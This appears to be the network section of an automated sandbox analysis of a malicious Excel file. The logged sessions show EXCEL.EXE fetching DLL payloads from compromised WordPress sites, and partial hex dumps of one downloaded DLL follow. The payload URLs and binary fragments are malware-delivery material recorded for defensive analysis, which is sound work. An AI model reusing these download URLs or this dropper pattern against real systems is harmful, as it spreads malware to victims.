                                                    May 23, 2022 09:19:15.102648973 CEST | 8.8.8.8 | 192.168.2.22 | 0x2ebc | No error (0) | vipteck.com | | 188.114.96.10 | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:19.299406052 CEST | 8.8.8.8 | 192.168.2.22 | 0xfee1 | No error (0) | salledemode.com | | 160.153.40.1 | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:24.652940989 CEST | 8.8.8.8 | 192.168.2.22 | 0xf9b | No error (0) | airliftlimo.com | | 159.203.19.2 | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:28.971402884 CEST | 8.8.8.8 | 192.168.2.22 | 0x5ee0 | No error (0) | kabeonet.pl | | 193.143.77.34 | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:31.121392012 CEST | 8.8.8.8 | 192.168.2.22 | 0x852 | No error (0) | www.kabeonet.pl | kabeonet.pl | | CNAME (Canonical name) | IN (0x0001)
                                                    May 23, 2022 09:19:31.121392012 CEST | 8.8.8.8 | 192.168.2.22 | 0x852 | No error (0) | kabeonet.pl | | 193.143.77.34 | A (IP address) | IN (0x0001)
                                                    May 23, 2022 09:19:49.792171001 CEST | 8.8.8.8 | 192.168.2.22 | 0x1 | No error (0) | windowsupdatebg.s.llnwi.net | | 95.140.236.128 | A (IP address) | IN (0x0001)
                                                    • vipteck.com
                                                    • airliftlimo.com
                                                    • salledemode.com
                                                    • kabeonet.pl
                                                    • www.kabeonet.pl
                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.22 | 49172 | 188.114.97.10 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.2.22 | 49174 | 159.203.19.2 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    2 | 192.168.2.22 | 49171 | 188.114.97.10 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    May 23, 2022 09:19:15.135399103 CEST | 2 | OUT | GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: vipteck.com
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:15.164824009 CEST | 3 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 23 May 2022 07:19:15 GMT
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Cache-Control: max-age=3600
                                                    Expires: Mon, 23 May 2022 08:19:15 GMT
                                                    Location: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s6qLK4kjD5bfy4rus9xkFLGcSyiCjdLx%2Br%2Ft61H%2FtgWWXQeFIFYRV4INLdcQUESx1uDQKREwn6goGmxhI%2BxiIP5ZKtK%2FbZbxX8MZYuVm9XyqGLtj7GHE0CvYFxB8hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Vary: Accept-Encoding
                                                    Server: cloudflare
                                                    CF-RAY: 70fc05afacd3912e-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    3 | 192.168.2.22 | 49173 | 160.153.40.1 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    May 23, 2022 09:19:19.464550972 CEST | 391 | OUT | GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: salledemode.com
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:19.643933058 CEST | 393 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:19 GMT
                                                    Server: Apache
                                                    X-Powered-By: PHP/7.2.34
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 23 May 2022 07:19:19 GMT
                                                    Content-Disposition: attachment; filename="me435CErJsFGw1q.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 628b3577889f1=1653290359; expires=Mon, 23-May-2022 07:20:19 GMT; Max-Age=60; path=/
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Last-Modified: Mon, 23 May 2022 07:19:19 GMT
                                                    Content-Length: 365056
                                                    Vary: Accept-Encoding
                                                    Strict-Transport-Security: max-age=300
                                                    Keep-Alive: timeout=5
                                                    Content-Type: application/x-msdownload


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.2.22 | 49175 | 193.143.77.34 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    May 23, 2022 09:19:29.019248009 CEST | 1152 | OUT | GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: kabeonet.pl
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:31.049067020 CEST | 1153 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 23 May 2022 07:19:29 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-Redirect-By: WordPress
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Location: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/
                                                    Content-Length: 0
                                                    Keep-Alive: timeout=2, max=100
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    5 | 192.168.2.22 | 49176 | 193.143.77.34 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    May 23, 2022 09:19:31.166353941 CEST | 1153 | OUT | GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: www.kabeonet.pl
                                                    Connection: Keep-Alive
                                                    May 23, 2022 09:19:32.260165930 CEST | 1155 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 23 May 2022 07:19:31 GMT
                                                    Server: Apache
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, Keep-Alive
                                                    Keep-Alive: timeout=2, max=100
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    May 23, 2022 09:19:32.260365963 CEST1164INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d
                                                    Data Ascii: eset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-ligh
                                                    May 23, 2022 09:19:32.260392904 CEST1166INData Raw: 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61
                                                    Data Ascii: r: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--pr
                                                    May 23, 2022 09:19:32.260417938 CEST1167INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72
                                                    Data Ascii: p--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !im
                                                    May 23, 2022 09:19:32.302309036 CEST1169INData Raw: 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c
                                                    Data Ascii: -blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-grad


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.22 | 49172 | 188.114.97.10 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    2022-05-23 07:19:15 UTC | 0 | OUT | GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                                                    Accept: */*
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: vipteck.com
                                                    Connection: Keep-Alive
                                                    2022-05-23 07:19:16 UTC | 0 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 23 May 2022 07:19:16 GMT
                                                    Content-Type: application/x-msdownload
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Powered-By: PHP/7.4.29
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 23 May 2022 07:19:15 GMT
                                                    Content-Disposition: attachment; filename="RD05UTHGkitvIJt.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 628b3573f41f6=1653290355; expires=Mon, 23-May-2022 07:20:15 GMT; Max-Age=60; path=/
                                                    Vary: X-Forwarded-Proto,Accept-Encoding
                                                    Last-Modified: Mon, 23 May 2022 07:19:15 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uPGWh%2BTiTHd2spFyuiEQ%2BYMvxNhN71WSSVJXCPqUmf9cs2f%2F7%2ByAB4JMZ8nYZX%2FgWhqp9ARVVqv9ddK8psWR4NnUtqrBjxVIw5NunB3WUyxM6577g%2B94d1sCHXt0oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 70fc05b35dce9945-FRA
                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                    Data Ascii: HT$DD$I ffHL$H(HD$0HD$HD$=MZt3NHD$Hc@<HL$HHHD$HD$8PEt3$HD$HH$H$=t3H(HT$HL$H(HD$0Hc@<HL$0HHH$D$H$@H$HDHD$
                                                    2022-05-23 07:19:16 UTC35INData Raw: c0 10 48 8d 0d 6a 1d 02 00 48 8b 0c 01 ff 15 48 8e 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 28 48 63 44 24 30 48 6b c0 10 48 8d 0d 38 1d 02 00 48 8b 0c 01 ff 15 1e 8e 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 18 48 8b 44 24 20 f0 ff 00 48 8b 44 24 20 48 83 b8 10 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 10 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 20 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 20 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 18 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 18 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 30 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 30 01 00 00 f0 ff 00 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 83 3c 24 05 0f 8f 89 00 00 00 48 63 04 24 48 6b c0 20
                                                    Data Ascii: HjHHH(L$H(HcD$0HkH8HH(HL$HHD$ HD$ HtHD$ HHD$ H tHD$ H HD$ HtHD$ HHD$ H0tHD$ H0$$$<$Hc$Hk
                                                    2022-05-23 07:19:16 UTC36INData Raw: 6b c0 20 48 8b 4c 24 50 48 8b 44 01 58 83 38 00 75 1d 48 63 44 24 30 48 6b c0 20 ba 02 00 00 00 48 8b 4c 24 50 48 8b 4c 01 58 e8 6b ba ff ff 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 74 16 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 75 5a 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 75 16 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 74 2e 48 8d 05 3c 9e 01 00 48 89 44 24 20 45 33 c9 41 b8 bc 00 00 00 48 8d 15 b7 9d 01 00 b9 02 00 00 00 e8 6d 1a 00 00 83 f8 01 75 03 cc 33 c0 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 74 4b 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 74 35 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 8b 44 01 60 83 38 00 75 1d 48 63 44 24 30 48
                                                    Data Ascii: k HL$PHDX8uHcD$0Hk HL$PHLXkHcD$0Hk HL$PH|PtHcD$0Hk HL$PH|`uZHcD$0Hk HL$PH|PuHcD$0Hk HL$PH|`t.H<HD$ E3AHmu3HcD$0Hk HL$PH|PtKHcD$0Hk HL$PH|`t5HcD$0Hk HL$PHD`8uHcD$0H
                                                    2022-05-23 07:19:16 UTC37INData Raw: 47 10 66 89 04 4a eb ce c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 81 7c 24 20 01 01 00 00 7d 20 48 63 44 24 20 48 63 4c 24 20 48 8d 15 2a 1b 02 00 48 8b 7c 24 28 0f b6 44 07 1c 88 04 0a eb cc c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 81 7c 24 20 00 01 00 00 7d 23 48 63 44 24 20 48 63 4c 24 20 48 8d 15 fc 1b 02 00 48 8b 7c 24 28 0f b6 84 07 1d 01 00 00 88 04 0a eb c9 48 8b 05 e3 1c 02 00 b9 ff ff ff ff f0 0f c1 08 ff c9 8b c1 85 c0 75 21 48 8d 05 9b 18 02 00 48 39 05 c4 1c 02 00 74 11 ba 02 00 00 00 48 8b 0d b6 1c 02 00 e8 81 b4 ff ff 48 8b 44 24 28 48 89 05 a5 1c 02 00 48 8b 44 24 28 f0 ff 00 b9 0d 00 00 00 e8 93 f4 ff ff eb 2f 83 7c 24 38 ff 75 28 48 8d 05 53 18 02 00 48 39 44 24 28 74 0f ba 02 00 00 00 48 8b 4c 24 28
                                                    Data Ascii: GfJD$ D$ D$ |$ } HcD$ HcL$ H*H|$(DD$ D$ D$ |$ }#HcD$ HcL$ HH|$(Hu!HH9tHHD$(HHD$(/|$8u(HSH9D$(tHL$(
                                                    2022-05-23 07:19:16 UTC39INData Raw: 24 30 77 2e 8b 44 24 30 ff c0 8b c0 48 8b 8c 24 88 00 00 00 0f b6 44 01 1c 83 c8 04 8b 4c 24 30 ff c1 8b c9 48 8b 94 24 88 00 00 00 88 44 0a 1c eb b9 eb 82 c7 44 24 30 01 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 81 7c 24 30 ff 00 00 00 73 2e 8b 44 24 30 ff c0 8b c0 48 8b 8c 24 88 00 00 00 0f b6 44 01 1c 83 c8 08 8b 4c 24 30 ff c1 8b c9 48 8b 94 24 88 00 00 00 88 44 0a 1c eb be 48 8b 84 24 88 00 00 00 8b 48 04 e8 a8 00 00 00 48 8b 8c 24 88 00 00 00 89 41 0c 48 8b 84 24 88 00 00 00 c7 40 08 01 00 00 00 eb 0f 48 8b 84 24 88 00 00 00 c7 40 08 00 00 00 00 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 83 7c 24 20 06 73 15 8b 44 24 20 33 c9 48 8b 94 24 88 00 00 00 66 89 4c 42 10 eb da 48 8b 8c 24 88 00 00 00 e8 a0 01 00 00 33 c0 eb 1f 83 3d 1d
                                                    Data Ascii: $0w.D$0H$DL$0H$DD$0D$0D$0|$0s.D$0H$DL$0H$DH$HH$AH$@H$@D$ D$ D$ |$ sD$ 3H$fLBH$3=
                                                    2022-05-23 07:19:16 UTC40INData Raw: 44 01 1c 83 c8 20 8b 8c 24 70 05 00 00 ff c1 8b c9 48 8b 94 24 b0 05 00 00 88 44 0a 1c 8b 84 24 70 05 00 00 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 0f b6 84 04 60 03 00 00 88 84 0a 1d 01 00 00 eb 17 8b 84 24 70 05 00 00 48 8b 8c 24 b0 05 00 00 c6 84 01 1d 01 00 00 00 e9 e8 fe ff ff e9 1a 01 00 00 c7 84 24 70 05 00 00 00 00 00 00 eb 10 8b 84 24 70 05 00 00 ff c0 89 84 24 70 05 00 00 81 bc 24 70 05 00 00 00 01 00 00 0f 83 ec 00 00 00 83 bc 24 70 05 00 00 41 72 5e 83 bc 24 70 05 00 00 5a 77 54 8b 84 24 70 05 00 00 ff c0 8b c0 48 8b 8c 24 b0 05 00 00 0f b6 44 01 1c 83 c8 10 8b 8c 24 70 05 00 00 ff c1 8b c9 48 8b 94 24 b0 05 00 00 88 44 0a 1c 8b 84 24 70 05 00 00 83 c0 20 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 88 84 0a 1d 01 00 00 eb 7f 83 bc 24 70
                                                    Data Ascii: D $pH$D$p$pH$`$pH$$p$p$p$p$pAr^$pZwT$pH$D$pH$D$p $pH$$p
                                                    2022-05-23 07:19:16 UTC41INData Raw: 00 00 00 00 c7 84 24 a0 00 00 00 00 00 00 00 48 83 bc 24 60 12 00 00 00 75 0a b8 01 00 00 00 e9 72 05 00 00 c6 84 24 b4 11 00 00 00 41 b8 04 01 00 00 48 8d 94 24 b0 10 00 00 33 c9 ff 15 fc 72 01 00 85 c0 75 46 4c 8d 05 09 93 01 00 ba 04 01 00 00 48 8d 8c 24 b0 10 00 00 e8 37 26 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 3c 01 00 00 4c 8d 0d ef 8e 01 00 4c 8d 05 b0 92 01 00 48 8d 15 41 92 01 00 8b c8 e8 6a d1 ff ff 48 8d 84 24 b0 10 00 00 48 89 84 24 98 00 00 00 48 8b 8c 24 98 00 00 00 e8 6d 2a 00 00 48 83 f8 40 0f 86 8d 00 00 00 48 8b 8c 24 98 00 00 00 e8 56 2a 00 00 48 8b 8c 24 98 00 00 00 48 8d 44 01 c0 48 89 84 24 98 00 00 00 48 8d 84 24 b0 10 00 00 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 b9 04 01 00 00 48 2b c8 48 8b c1 41 b9 03 00 00 00 4c 8b 05
                                                    Data Ascii: $H$`ur$AH$3ruFLH$7&HD$(D$ <LLHAjH$H$H$m*H@H$V*H$HDH$H$H$H+HH+HAL
                                                    2022-05-23 07:19:16 UTC43INData Raw: e8 68 59 00 00 89 84 24 c0 11 00 00 83 bc 24 c0 11 00 00 03 75 14 b9 16 00 00 00 e8 7d 1c 00 00 b9 03 00 00 00 e8 13 bd ff ff 83 bc 24 c0 11 00 00 04 75 07 b8 01 00 00 00 eb 02 33 c0 48 8b 8c 24 28 12 00 00 48 33 cc e8 e0 7e ff ff 48 81 c4 38 12 00 00 c3 cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 48 48 8d 44 24 78 48 89 44 24 30 48 8b 44 24 30 48 89 44 24 28 48 8b 44 24 70 48 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 48 8b 54 24 58 8b 4c 24 50 e8 23 00 00 00 89 44 24 38 48 c7 44 24 30 00 00 00 00 8b 44 24 38 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 38 48 8b 44 24 68 48 89 44 24 28 48 8b 44 24 60 48 89 44 24 20 4c 8b 4c 24 58 44 8b
                                                    Data Ascii: hY$$u}$u3H$(H3~H8LL$ DD$HT$L$HHHD$xHD$0HD$0HD$(HD$pHD$ LL$hDD$`HT$XL$P#D$8HD$0D$8HHLL$ DD$HT$L$H8HD$hHD$(HD$`HD$ LL$XD
                                                    2022-05-23 07:19:16 UTC44INData Raw: 89 54 24 68 48 8b 94 24 e8 22 00 00 48 89 54 24 60 48 8b 94 24 f0 22 00 00 48 89 54 24 58 48 8b 94 24 f8 22 00 00 48 89 54 24 50 48 8b 94 24 00 23 00 00 48 89 54 24 48 48 8b 94 24 08 23 00 00 48 89 54 24 40 48 8b 94 24 18 23 00 00 48 89 54 24 38 48 8b 94 24 20 23 00 00 48 89 54 24 30 48 8b 94 24 98 00 00 00 48 89 54 24 28 48 8b 04 c1 48 89 44 24 20 4c 8d 0d f8 89 01 00 41 b8 ff 0f 00 00 ba 00 10 00 00 48 8d 8c 24 b0 00 00 00 e8 50 5c 00 00 89 84 24 a0 00 00 00 83 bc 24 a0 00 00 00 00 7d 47 e8 da f1 ff ff 48 c7 44 24 38 00 00 00 00 c7 44 24 30 60 01 00 00 48 8d 0d f2 83 01 00 48 89 4c 24 28 48 8d 0d 0e 8c 01 00 48 89 4c 24 20 4c 8d 0d 2a 7a 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b 08 e8 08 b5 ff ff e8 93 f1 ff ff 8b 8c 24 c4 22 00 00 89 08 83 bc 24 a0 00
                                                    Data Ascii: T$hH$"HT$`H$"HT$XH$"HT$PH$#HT$HH$#HT$@H$#HT$8H$ #HT$0H$HT$(HHD$ LAH$P\$$}GHD$8D$0`HHL$(HHL$ L*zA"$"$
                                                    2022-05-23 07:19:16 UTC45INData Raw: 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 41 b8 01 00 00 00 ba 17 04 00 c0 b9 02 00 00 00 e8 23 00 00 00 ff 15 35 62 01 00 ba 17 04 00 c0 48 8b c8 ff 15 1f 62 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 89 4c 24 08 57 48 81 ec 10 06 00 00 48 8b 05 ac f1 01 00 48 33 c4 48 89 84 24 00 06 00 00 83 bc 24 20 06 00 00 ff 74 0c 8b 8c 24 20 06 00 00 e8 03 cf ff ff c7 84 24 60 05 00 00 00 00 00 00 48 8d 84 24 64 05 00 00 48 8b f8 33 c0 b9 94 00 00 00 f3 aa 48 8d 84 24 60 05 00 00 48 89 44 24 40 48 8d 44 24 70 48 89 44 24 48 c7 44 24 50 00 00 00 00 c7 84 24 50 05 00 00 00 00 00 00 48 8d 4c 24 70 ff 15 b7 61 01 00 48 8b 84 24 68 01 00 00 48 89 84 24 48 05 00 00 45 33 c0 48 8d 94 24 58 05 00 00 48 8b 8c 24 48 05 00 00
                                                    Data Ascii: LD$HT$HL$H(A#5bHbH(DD$T$L$WHHH3H$$ t$ $`H$dH3H$`HD$@HD$pHD$HD$P$PHL$paH$hH$HE3H$XH$H
                                                    2022-05-23 07:19:16 UTC47INData Raw: 48 e8 dc a4 ff ff 48 8b 00 48 89 84 24 80 00 00 00 48 8d 4c 24 48 e8 c7 a4 ff ff c7 44 24 38 01 00 00 00 48 8b 4c 24 78 8b 49 14 89 4c 24 30 48 8b 8c 24 80 00 00 00 8b 49 04 89 4c 24 28 48 8d 4c 24 40 48 89 4c 24 20 44 8b 4c 24 44 4c 8d 44 24 68 ba 01 00 00 00 48 8b c8 e8 13 31 00 00 85 c0 75 18 c7 44 24 70 00 00 00 00 48 8d 4c 24 48 e8 2d a4 ff ff 8b 44 24 70 eb 1e 0f b7 44 24 40 23 84 24 a8 00 00 00 89 44 24 74 48 8d 4c 24 48 e8 0d a4 ff ff 8b 44 24 74 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 4c 8b d9 48 2b d1 0f 82 9e 01 00 00 49 83 f8 08 72 61 f6 c1 07 74 36 f6 c1 01 74 0b 8a 04 0a 49 ff c8 88 01 48 ff c1 f6 c1 02 74 0f 66 8b 04 0a 49 83 e8 02 66 89 01 48 83 c1 02 f6 c1 04 74 0d 8b 04 0a 49 83 e8 04 89 01 48 83 c1 04
                                                    Data Ascii: HHH$HL$HD$8HL$xIL$0H$IL$(HL$@HL$ DL$DLD$hH1uD$pHL$H-D$pD$@#$D$tHL$HD$tHffLH+Irat6tIHtfIfHtIH
                                                    2022-05-23 07:19:16 UTC48INData Raw: 38 e8 43 81 ff ff 48 89 44 24 30 48 83 7c 24 30 00 75 04 33 c0 eb 76 48 8b 44 24 38 48 8b 4c 24 48 48 2b c8 48 8b c1 48 c1 f8 03 48 8b 4c 24 30 48 8d 04 c1 48 89 44 24 48 48 8b 44 24 30 48 89 44 24 38 48 8b 4c 24 38 ff 15 a3 57 01 00 48 89 05 64 1e 02 00 48 8b 4c 24 70 ff 15 91 57 01 00 48 8b 4c 24 48 48 89 01 48 8b 44 24 48 48 83 c0 08 48 89 44 24 48 48 8b 4c 24 48 ff 15 70 57 01 00 48 89 05 29 1e 02 00 48 8b 44 24 70 48 83 c4 68 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 ed fd ff ff 48 85 c0 75 0a c7 44 24 20 ff ff ff ff eb 08 c7 44 24 20 00 00 00 00 8b 44 24 20 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 c7 44 24 20 cc 00 00 00 4c 8d 0d c5 7d 01 00 41 b8 02 00 00 00 ba 08 00 00 00 b9 20 00 00 00 e8 c8 7f
                                                    Data Ascii: 8CHD$0H|$0u3vHD$8HL$HH+HHHL$0HHD$HHD$0HD$8HL$8WHdHL$pWHL$HHHD$HHHD$HHL$HpWH)HD$pHhHL$H8HL$@HuD$ D$ D$ H8HHD$ L}A
